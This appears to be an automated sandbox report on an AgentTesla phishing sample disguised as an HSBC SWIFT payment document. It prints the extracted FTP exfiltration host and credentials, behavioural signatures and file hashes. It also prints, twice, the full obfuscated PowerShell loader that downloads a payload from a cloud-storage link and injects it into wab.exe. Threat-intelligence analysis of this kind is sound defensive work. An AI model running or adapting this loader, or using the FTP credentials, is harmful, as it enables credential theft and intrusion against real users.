Analysis
-
max time kernel
140s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
29-04-2024 13:05
Static task
static1
Behavioral task
behavioral1
Sample
25042024 - HSBC Payment SWIFT COPY PAGES.hta
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
25042024 - HSBC Payment SWIFT COPY PAGES.hta
Resource
win10v2004-20240419-en
General
-
Target
25042024 - HSBC Payment SWIFT COPY PAGES.hta
-
Size
8KB
-
MD5
faf3762a6e994f4e79d87d817ce62e16
-
SHA1
85517ba95bed123d356ce026192d913acf6e97ea
-
SHA256
413edb098cc00d5456c57941a10faf691f8ca3266ae6d8538636b7ea9bcf660f
-
SHA512
b7522895d2d72d1980184b0d0dc19d1e22082311bfbbe77ead3e9039c650dd5527970c86a74982c87e05255d18e7c6b016187747b4b99be0b155ca351ecf1c92
-
SSDEEP
192:pFH6Jy7ik4n2AV2PP0PFDQlHfCe4z9dfzWQ/0EY2ibM0wTstRA:pj472EPFy/Ce4znfzWQ//JiM5Te+
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.petrolic-eg.com - Port:
21 - Username:
outcome - Password:
Random@1245
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2888 powershell.exe 7 2888 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 api.ipify.org 14 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 352 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2688 powershell.exe 352 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2688 set thread context of 352 2688 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2888 powershell.exe 2688 powershell.exe 2688 powershell.exe 352 wab.exe 352 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2888 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 352 wab.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
mshta.exepowershell.exepowershell.exedescription pid process target process PID 2768 wrote to memory of 2888 2768 mshta.exe powershell.exe PID 2768 wrote to memory of 2888 2768 mshta.exe powershell.exe PID 2768 wrote to memory of 2888 2768 mshta.exe powershell.exe PID 2768 wrote to memory of 2888 2768 mshta.exe powershell.exe PID 2888 wrote to memory of 2616 2888 powershell.exe cmd.exe PID 2888 wrote to memory of 2616 2888 powershell.exe cmd.exe PID 2888 wrote to memory of 2616 2888 powershell.exe cmd.exe PID 2888 wrote to memory of 2616 2888 powershell.exe cmd.exe PID 2888 wrote to memory of 2688 2888 powershell.exe powershell.exe PID 2888 wrote to memory of 2688 2888 powershell.exe powershell.exe PID 2888 wrote to memory of 2688 2888 powershell.exe powershell.exe PID 2888 wrote to memory of 2688 2888 powershell.exe powershell.exe PID 2688 wrote to memory of 1728 2688 powershell.exe cmd.exe PID 2688 wrote to memory of 1728 2688 powershell.exe cmd.exe PID 2688 wrote to memory of 1728 2688 powershell.exe cmd.exe PID 2688 wrote to memory of 1728 2688 powershell.exe cmd.exe PID 2688 wrote to memory of 352 2688 powershell.exe wab.exe PID 2688 wrote to memory of 352 2688 powershell.exe wab.exe PID 2688 wrote to memory of 352 2688 powershell.exe wab.exe PID 2688 wrote to memory of 352 2688 powershell.exe wab.exe PID 2688 wrote to memory of 352 2688 powershell.exe wab.exe PID 2688 wrote to memory of 352 2688 powershell.exe wab.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\25042024 - HSBC Payment SWIFT COPY PAGES.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Brlet = 1;$Monimolite='Substrin';$Monimolite+='g';Function Rhd($Chefkonsulenten121){$Containerterminalernes=$Chefkonsulenten121.Length-$Brlet;For($Salgsprisens=5; $Salgsprisens -lt $Containerterminalernes; $Salgsprisens+=(6)){$Udseenderne+=$Chefkonsulenten121.$Monimolite.Invoke($Salgsprisens, $Brlet);}$Udseenderne;}function Tonitas($Nontraditional){&($Ublufrdigheden) ($Nontraditional);}$Artighedernes=Rhd ',aiwaMBegyno E,sizFllesiRejemlSy,telRabidaC,tal/ D.li5 etap. U.va0Serv, crypt( InevW,ymphiJagtlnNeurodMatemo HoldwLa gusa,tin GeneoNUnfulT Whar Reakt1Snowi0Celti.Spott0B.udu;Landm enegWbalaciTurnenNonv,6Esche4Fibon;Prona Pr.olxB.gge6Arsoi4provi;Brave BravirPirogv D,st:Briga1Ce,ha2Innov1Kal.e.Corra0Ri ua)Morch Au.tGDdsk eLattecSa.thkE.hedoFagle/ ldol2S,and0Expos1 Skol0 Ta,m0 Bred1Forme0Belus1M lle SlanFIndefiHimmerpublie,ikotfunimpoSaplex Burg/Sto.s1Brnds2Sysse1Campa. .ope0 hit ';$Kilobytenes=Rhd 'Barn UAnonys SpineTandkrClo.k-Dest,ANeg,ig MigreSkannnTongutSorts ';$phytoplasm=Rhd 'Hexachdiannt M,trtPr sapStadss U,sa:K.rul/Macro/,iktadPenalrUdenriAhartvKontreFedtf.Mas.eg LovroListeob rtlgSpumelOsteoePolar.blawicKommuoKred m ank/HeteruSydslc Gal,?FagbleCosm,xShorepAnirioCo mirIntrotcanyo=RushidC prio TykhwlucernPrerelSondaomaalra KurtdFlatb&Silkei OrdtdAuks =Permu1 FolkQPreplHRennewS,rog_SolacaStvekt darmmmaureuGenerRStartrK nku5,ntomETas.n1 miliv Mou,GExodexTuretGBrugeJU,loamCubatPenfouo Fem,1ModifMUlyste Tint0TallodSemandRecryFAutenYPokke8bu zazttnesSApurp ';$Kildematerialet=Rhd 'eva o>Passa ';$Ublufrdigheden=Rhd 'ince.iProd,e IntexRid,h ';$Festered='Anstandsdames';Tonitas (Rhd 'Sa grS BrileMortitSermo- R avCEndomoJurisnRadiltBagd.eSerranEkspotAffal Let a-sn skPOversau mantFagkohRavin KalorT hand: Viru\VerdeO ArgaxMaguay MusldXanth.RudimtIglooxTotaltSursy v,rs-C wboVAftviaFuldelAfskiuMiliteDepra Bodyb$UforsF pdee Pre sMedi.t prvee RattrS iseeRumfad.ifto;Pelsd ');Tonitas (Rhd 'MultiiF.rfif owe Bangl(FeststIdiose M,mssSabaetRgfor-CulotpExempaEmbrotSkudlh Neds perp.TMalp : odes\SalveOLoxi,x V.siyTopkod Graa.GenertHuarax TsentRgrel) C ly{ LommeMetodxko.ceiEffe.tDimmi},lndv;Khaju ');$Switchgear = Rhd '.nkteeIn.arc optihcasefoEpide S,age%Stoppa A mipMoresp ,robdd capaVaaretVittiaSclat%Smleh\AdverSValeupalkydeDebitc vnhiGensbfSymboiCholecrafleeShortr Spati.ullan Thacg Pav eTrekanPolymsWordi.PageufBegotr onnoiOph.h P oth& .eal& Nitr Censoe opsocForsthL dseoAntic mal.c$Stigm ';Tonitas (Rhd 'Apast$Kemikg L,cklStrowoAfspnb S raaKommalFikse:Unsp PArginrEffemoPljerlbomb,e AnnetValetaM camr,ntikiVam esHalfneP,odurAffileA,dittJackf=Miser(SvartcClawemLa,dsdMonoc Flagd/,uculcLa.df Sysle$feltpSAb trwEnsuliHo.dntPilmbcSortshOver,gC.paieBoghoaFo,laragren)Jaal. ');Tonitas (Rhd 'Balan$Brookg,jemslU.arioU,affbary naStewalBukse:De.ilTEnergy oncurNonpoa avetnKunstnAnthee toplr KatanPycniePe un=El ct$Sa ompHirakhcra.ey au.ot ForsoStormpclotwlDihysaOver,sChar mSells.Ther.s kirspTobaklSnowbiSalontUnyac(Trstr$HypnoK TlpeiQuoinl Su,cdPisseeCytopmSknk,aPronet Sl.vedisburHiccuiCa.quaStrablNulpue AarltRumli) Bred ');$phytoplasm=$Tyrannerne[0];Tonitas (Rhd 'pinch$StrukgTrommlExt.aoSp.lobInteraSkridlV,deo:SvensM Bedee ,ekrnQuiz aCacocc ,eltefor.em SemieSpirin .erct oman=GodkeNSoot e.loatwFo.sk-SatinOSkillbStbegjForsie.ntiscVag ptSnort I,raeS HuskyRe.arsTyvektUn ureHabsbmNomin. VelsNDerboeGemaltKirte.Nyta,W S,nie AadsbGalocC arrelUd ggi CabeeDisprnRe litLejes ');Tonitas (Rhd 'Meses$DokumMCo.mae Krikn KhamaI.eloc Artee sagtmFundae lagenPropht,ulga.OracuH Te.se Op,ea AfskdlinseeSbebor B.ddsRigdo[Flade$UnbedKBut kiHelullMarjaoarmodbornityUntumt .raveSkoinnJuareePlantsBoxma]Polle=lopho$VioliATredjrBa bitOve,siFredlgScybahVariaeunpoidReckoebe lyr AbesnBristeRe.nisBli d ');$Middleclass136=Rhd 'In.anMReg seBlyannInstraStrancDesideNonsumAns,aeOm ednProjetCof,c.A,watDWo,bioori.nwcinn.nAfgiflbowero Absta rgbod PostFCentriTodaglDri ze alpe(Inost$ Affop Ansph,ncomyDideptSibyloslyngp sk,rlOver,aGlirisForgrmPrp,r,appro$JustiP p.oda.innahCompas ernieCymatrpatar)Milje ';$Middleclass136=$Proletariseret[1]+$Middleclass136;$Pahser=$Proletariseret[0];Tonitas (Rhd 'Unmec$ArtergBehaglSpaewoOverfb.rigcaIdeollM.zed: FeriB NumirPenalomachib,hainySkolegUnve.g.eucoedominrTransiDulbee billrTorc,n CockeModer=Outri(OppusTSinapeUn,masBomset ,nth- InteP,tninaCiviltMad.phAnnon elta$K.rniP.uvgeafrkaphBoblesFlk,eeK nser P ag)Heart ');while (!$Brobyggerierne) {Tonitas (Rhd ' Pric$Fordag AminlR,vivoBenevb .vera BemelZagg.:.fterSK bebcBov,iaUdvaenSquamdUnimpaKamfelViruli GrubsA.alieChaindDocum=Smidi$ CarctCyrtor UndsuBirose Micr ') ;Tonitas $Middleclass136;Tonitas (Rhd ' Sl.tSSlipotOrdinabeev rSupertUnsyn- Ser.SSt.enlpereueSkriveSpo,lpMachi Dan,e4 Ult ');Tonitas (Rhd 'Inter$Regnsgbl trl Runao JapibKata.aHomogl tolt:Au unBU skir Ua mo.trikbSenneySpretgpleasgObjekeBe.gerHul,ti PrioeUnrevrCanann Unr e Hell=S.yge( La eTDogsle,ersks ubritTresp-SkattPDgnceaPenoct Mat.h Desp ,nbru$Dowe.PBayamaCounth FremsBaad,eGafferMeria)Preob ') ;Tonitas (Rhd 'Bejap$proz.gMalnulsydl.oQuavebEndama triqlAgave:Hi.cuGVenviaV,albrGravla ski,=Morte$Belusg ClaslSkabeofunktbPos paindefl Acro:CheriNDelo oBrollnM tincNipcho OctanbistavKrim,e H mor CoresKof,aa KampbUdsvelMische Syd,nTampee Pla,sFersksSy le2anton2Uafst6Sorge+ Chri+S,inb%Compl$ men,TCystoyLsesarStanga s.ann S,rannytese C.iar Gia,nEndosePhoni.,lpincB.rtlo Spl u ArtinnonsytS bdi ') ;$phytoplasm=$Tyrannerne[$Gara];}Tonitas (Rhd 'Spec $ .avogTehanlS.ympoNunnibGiganauncaulSmigr:HenstPVaskehKloroialacrlPosteaAuritnGipsytKampuhNov.brNat ooMe.chpR dikiSkalls.kureiDrgl,nKom.igSt.rt2Orran2stlan3Offic Tunne=Kredi togebG neume.rdsetT ade-F,ankCU,dero An,in Ny tt Ver eMentanKn,ghtApofe Impal$ Mi.cPSmugra Subuh TempsB lboe Twi.rsk ot ');Tonitas (Rhd ',rlys$Wilsog ArgulSt deohousebSpyetaIfrerlHippa:Bor,hT hvidoS.irrb tigaIncaskcinepsE,versO,tanoWinfivUnpinsSupe eInternFanglsRvrdi Ly.st=Solmi .nde[Ud.anSOversy ntersHyloit.uldeeStdfamWe.gh.NoretCSav roServinStr kvS ntaeJaiwhrAndelttrass] Spik: P.ra: AbsoFSemiorOpposoSto,kmTosdeBUdlodaStyklsunpoae Livs6konge4DeligS Soult chevr Des.iArbejnEuropg Unde(Propy$ ImpePEllokhA,omii Faral Tr paFavntnTetrat PhyshFi,mir ForsoUngu,pFirevi OrgusSammeiGliganBorg gEmbra2Septi2 Skra3extra) Fien ');Tonitas (Rhd ' nraa$Non.ngHydrolBondeoUn,abb,ubloa RummlDe ic:GalilE Ca.asEnfrao IncupProtehVeltiaB.dutgSolfeo VarisTr,dat Ind,oUnderm Collysorte Yderi=Holle ,odsp[immorSIce,ayBeg.dsUbehetLovfoeArre.m S in. FrutTpsalteKvab.xcentrtLinan.Frie,EIsaben SigmcAnch oDe,ogd ShapiRor enProcegUnlot] Dry.:Pregr:AbnegAEut,pSBureaCUntowIOrnamIU,tra.CoappGUricaeKlodstove.mSWallitScenerTobakiCha,tnAvisugLangs(Soff $ KalmToverboNoncobAntimaSan,sk mestsInvers Lapio UdenvC,itisRednie Regin ikkes ende)Frem, ');Tonitas (Rhd 'Gldsv$ BssegHerbel ortaoPraksbMorseaHyperlmarik:Ro teA,illinTr agdInt reOvercrIroniiVeter=Psitt$VentrEdrm,esOphngo Npb p ,ktehSt.ppaRepugg S.oco GnavsNeol.tFakkeoSp.ogmPh.naySamit.Diaces ctiou re.lbKontrsS irttDisperTimotiSva mnF,ispgDiete(Pseud2Stude9B.ite8Die,e6Scrim8 Regn2Bi io,Unos,2O,ers8 Unfe9Fejes9spryd1 Stor) Me l ');Tonitas $Anderi;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificeringens.fri && echo $"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Brlet = 1;$Monimolite='Substrin';$Monimolite+='g';Function Rhd($Chefkonsulenten121){$Containerterminalernes=$Chefkonsulenten121.Length-$Brlet;For($Salgsprisens=5; $Salgsprisens -lt $Containerterminalernes; $Salgsprisens+=(6)){$Udseenderne+=$Chefkonsulenten121.$Monimolite.Invoke($Salgsprisens, $Brlet);}$Udseenderne;}function Tonitas($Nontraditional){&($Ublufrdigheden) ($Nontraditional);}$Artighedernes=Rhd ',aiwaMBegyno E,sizFllesiRejemlSy,telRabidaC,tal/ D.li5 etap. U.va0Serv, crypt( InevW,ymphiJagtlnNeurodMatemo HoldwLa gusa,tin GeneoNUnfulT Whar Reakt1Snowi0Celti.Spott0B.udu;Landm enegWbalaciTurnenNonv,6Esche4Fibon;Prona Pr.olxB.gge6Arsoi4provi;Brave BravirPirogv D,st:Briga1Ce,ha2Innov1Kal.e.Corra0Ri ua)Morch Au.tGDdsk eLattecSa.thkE.hedoFagle/ ldol2S,and0Expos1 Skol0 Ta,m0 Bred1Forme0Belus1M lle SlanFIndefiHimmerpublie,ikotfunimpoSaplex Burg/Sto.s1Brnds2Sysse1Campa. .ope0 hit ';$Kilobytenes=Rhd 'Barn UAnonys SpineTandkrClo.k-Dest,ANeg,ig MigreSkannnTongutSorts ';$phytoplasm=Rhd 'Hexachdiannt M,trtPr sapStadss U,sa:K.rul/Macro/,iktadPenalrUdenriAhartvKontreFedtf.Mas.eg LovroListeob rtlgSpumelOsteoePolar.blawicKommuoKred m ank/HeteruSydslc Gal,?FagbleCosm,xShorepAnirioCo mirIntrotcanyo=RushidC prio TykhwlucernPrerelSondaomaalra KurtdFlatb&Silkei OrdtdAuks =Permu1 FolkQPreplHRennewS,rog_SolacaStvekt darmmmaureuGenerRStartrK nku5,ntomETas.n1 miliv Mou,GExodexTuretGBrugeJU,loamCubatPenfouo Fem,1ModifMUlyste Tint0TallodSemandRecryFAutenYPokke8bu zazttnesSApurp ';$Kildematerialet=Rhd 'eva o>Passa ';$Ublufrdigheden=Rhd 'ince.iProd,e IntexRid,h ';$Festered='Anstandsdames';Tonitas (Rhd 'Sa grS BrileMortitSermo- R avCEndomoJurisnRadiltBagd.eSerranEkspotAffal Let a-sn skPOversau mantFagkohRavin KalorT hand: Viru\VerdeO ArgaxMaguay MusldXanth.RudimtIglooxTotaltSursy v,rs-C wboVAftviaFuldelAfskiuMiliteDepra Bodyb$UforsF pdee Pre sMedi.t prvee RattrS iseeRumfad.ifto;Pelsd ');Tonitas (Rhd 'MultiiF.rfif owe Bangl(FeststIdiose M,mssSabaetRgfor-CulotpExempaEmbrotSkudlh Neds perp.TMalp : odes\SalveOLoxi,x V.siyTopkod Graa.GenertHuarax TsentRgrel) C ly{ LommeMetodxko.ceiEffe.tDimmi},lndv;Khaju ');$Switchgear = Rhd '.nkteeIn.arc optihcasefoEpide S,age%Stoppa A mipMoresp ,robdd capaVaaretVittiaSclat%Smleh\AdverSValeupalkydeDebitc vnhiGensbfSymboiCholecrafleeShortr Spati.ullan Thacg Pav eTrekanPolymsWordi.PageufBegotr onnoiOph.h P oth& .eal& Nitr Censoe opsocForsthL dseoAntic mal.c$Stigm ';Tonitas (Rhd 'Apast$Kemikg L,cklStrowoAfspnb S raaKommalFikse:Unsp PArginrEffemoPljerlbomb,e AnnetValetaM camr,ntikiVam esHalfneP,odurAffileA,dittJackf=Miser(SvartcClawemLa,dsdMonoc Flagd/,uculcLa.df Sysle$feltpSAb trwEnsuliHo.dntPilmbcSortshOver,gC.paieBoghoaFo,laragren)Jaal. ');Tonitas (Rhd 'Balan$Brookg,jemslU.arioU,affbary naStewalBukse:De.ilTEnergy oncurNonpoa avetnKunstnAnthee toplr KatanPycniePe un=El ct$Sa ompHirakhcra.ey au.ot ForsoStormpclotwlDihysaOver,sChar mSells.Ther.s kirspTobaklSnowbiSalontUnyac(Trstr$HypnoK TlpeiQuoinl Su,cdPisseeCytopmSknk,aPronet Sl.vedisburHiccuiCa.quaStrablNulpue AarltRumli) Bred ');$phytoplasm=$Tyrannerne[0];Tonitas (Rhd 'pinch$StrukgTrommlExt.aoSp.lobInteraSkridlV,deo:SvensM Bedee ,ekrnQuiz aCacocc ,eltefor.em SemieSpirin .erct oman=GodkeNSoot e.loatwFo.sk-SatinOSkillbStbegjForsie.ntiscVag ptSnort I,raeS HuskyRe.arsTyvektUn ureHabsbmNomin. VelsNDerboeGemaltKirte.Nyta,W S,nie AadsbGalocC arrelUd ggi CabeeDisprnRe litLejes ');Tonitas (Rhd 'Meses$DokumMCo.mae Krikn KhamaI.eloc Artee sagtmFundae lagenPropht,ulga.OracuH Te.se Op,ea AfskdlinseeSbebor B.ddsRigdo[Flade$UnbedKBut kiHelullMarjaoarmodbornityUntumt .raveSkoinnJuareePlantsBoxma]Polle=lopho$VioliATredjrBa bitOve,siFredlgScybahVariaeunpoidReckoebe lyr AbesnBristeRe.nisBli d ');$Middleclass136=Rhd 'In.anMReg seBlyannInstraStrancDesideNonsumAns,aeOm ednProjetCof,c.A,watDWo,bioori.nwcinn.nAfgiflbowero Absta rgbod PostFCentriTodaglDri ze alpe(Inost$ Affop Ansph,ncomyDideptSibyloslyngp sk,rlOver,aGlirisForgrmPrp,r,appro$JustiP p.oda.innahCompas ernieCymatrpatar)Milje ';$Middleclass136=$Proletariseret[1]+$Middleclass136;$Pahser=$Proletariseret[0];Tonitas (Rhd 'Unmec$ArtergBehaglSpaewoOverfb.rigcaIdeollM.zed: FeriB NumirPenalomachib,hainySkolegUnve.g.eucoedominrTransiDulbee billrTorc,n CockeModer=Outri(OppusTSinapeUn,masBomset ,nth- InteP,tninaCiviltMad.phAnnon elta$K.rniP.uvgeafrkaphBoblesFlk,eeK nser P ag)Heart ');while (!$Brobyggerierne) {Tonitas (Rhd ' Pric$Fordag AminlR,vivoBenevb .vera BemelZagg.:.fterSK bebcBov,iaUdvaenSquamdUnimpaKamfelViruli GrubsA.alieChaindDocum=Smidi$ CarctCyrtor UndsuBirose Micr ') ;Tonitas $Middleclass136;Tonitas (Rhd ' Sl.tSSlipotOrdinabeev rSupertUnsyn- Ser.SSt.enlpereueSkriveSpo,lpMachi Dan,e4 Ult ');Tonitas (Rhd 'Inter$Regnsgbl trl Runao JapibKata.aHomogl tolt:Au unBU skir Ua mo.trikbSenneySpretgpleasgObjekeBe.gerHul,ti PrioeUnrevrCanann Unr e Hell=S.yge( La eTDogsle,ersks ubritTresp-SkattPDgnceaPenoct Mat.h Desp ,nbru$Dowe.PBayamaCounth FremsBaad,eGafferMeria)Preob ') ;Tonitas (Rhd 'Bejap$proz.gMalnulsydl.oQuavebEndama triqlAgave:Hi.cuGVenviaV,albrGravla ski,=Morte$Belusg ClaslSkabeofunktbPos paindefl Acro:CheriNDelo oBrollnM tincNipcho OctanbistavKrim,e H mor CoresKof,aa KampbUdsvelMische Syd,nTampee Pla,sFersksSy le2anton2Uafst6Sorge+ Chri+S,inb%Compl$ men,TCystoyLsesarStanga s.ann S,rannytese C.iar Gia,nEndosePhoni.,lpincB.rtlo Spl u ArtinnonsytS bdi ') ;$phytoplasm=$Tyrannerne[$Gara];}Tonitas (Rhd 'Spec $ .avogTehanlS.ympoNunnibGiganauncaulSmigr:HenstPVaskehKloroialacrlPosteaAuritnGipsytKampuhNov.brNat ooMe.chpR dikiSkalls.kureiDrgl,nKom.igSt.rt2Orran2stlan3Offic Tunne=Kredi togebG neume.rdsetT ade-F,ankCU,dero An,in Ny tt Ver eMentanKn,ghtApofe Impal$ Mi.cPSmugra Subuh TempsB lboe Twi.rsk ot ');Tonitas (Rhd ',rlys$Wilsog ArgulSt deohousebSpyetaIfrerlHippa:Bor,hT hvidoS.irrb tigaIncaskcinepsE,versO,tanoWinfivUnpinsSupe eInternFanglsRvrdi Ly.st=Solmi .nde[Ud.anSOversy ntersHyloit.uldeeStdfamWe.gh.NoretCSav roServinStr kvS ntaeJaiwhrAndelttrass] Spik: P.ra: AbsoFSemiorOpposoSto,kmTosdeBUdlodaStyklsunpoae Livs6konge4DeligS Soult chevr Des.iArbejnEuropg Unde(Propy$ ImpePEllokhA,omii Faral Tr paFavntnTetrat PhyshFi,mir ForsoUngu,pFirevi OrgusSammeiGliganBorg gEmbra2Septi2 Skra3extra) Fien ');Tonitas (Rhd ' nraa$Non.ngHydrolBondeoUn,abb,ubloa RummlDe ic:GalilE Ca.asEnfrao IncupProtehVeltiaB.dutgSolfeo VarisTr,dat Ind,oUnderm Collysorte Yderi=Holle ,odsp[immorSIce,ayBeg.dsUbehetLovfoeArre.m S in. FrutTpsalteKvab.xcentrtLinan.Frie,EIsaben SigmcAnch oDe,ogd ShapiRor enProcegUnlot] Dry.:Pregr:AbnegAEut,pSBureaCUntowIOrnamIU,tra.CoappGUricaeKlodstove.mSWallitScenerTobakiCha,tnAvisugLangs(Soff $ KalmToverboNoncobAntimaSan,sk mestsInvers Lapio UdenvC,itisRednie Regin ikkes ende)Frem, ');Tonitas (Rhd 'Gldsv$ BssegHerbel ortaoPraksbMorseaHyperlmarik:Ro teA,illinTr agdInt reOvercrIroniiVeter=Psitt$VentrEdrm,esOphngo Npb p ,ktehSt.ppaRepugg S.oco GnavsNeol.tFakkeoSp.ogmPh.naySamit.Diaces ctiou re.lbKontrsS irttDisperTimotiSva mnF,ispgDiete(Pseud2Stude9B.ite8Die,e6Scrim8 Regn2Bi io,Unos,2O,ers8 Unfe9Fejes9spryd1 Stor) Me l ');Tonitas $Anderi;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificeringens.fri && echo $"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5b3136c14ef70cee96f41cd5679be3426
SHA11ccb442efd7159cf26bed887ff12e006c92d03e3
SHA256203dbf2a8917f219b4ed0c53f219639dae25286f33a4eca83dc3441be2218a81
SHA512e76ccf382fe76c61d97140a93d3f3654cefe494fc2ba726f3bd322168b92f18e9e228087fd1b786a15d27e205a95c10f7d123dc4d4ec2ce2ca394b98fba233e8
-
C:\Users\Admin\AppData\Roaming\Specificeringens.friFilesize
426KB
MD536c02906ed6e72454a84bf3f874f3e8d
SHA10f8ba64a4da4871058d283a7e08b4a185e7b891e
SHA2567a565e10f6fd5a9e8c22c632c3c86f0b66773e373e4e14deb6bd190382c3cb98
SHA512a5b1337872b951392570b2238e8334b60172a257631f0bfb3680dd0ee75490258c4200e08bb9b1f257afdfd0ca17f72d49c612e5e8ff17ded6f4c0ea33f813f8
-
memory/352-37-0x0000000000FD0000-0x0000000002032000-memory.dmpFilesize
16.4MB
-
memory/352-38-0x0000000000FD0000-0x0000000001010000-memory.dmpFilesize
256KB
-
memory/2688-15-0x0000000006530000-0x0000000008321000-memory.dmpFilesize
29.9MB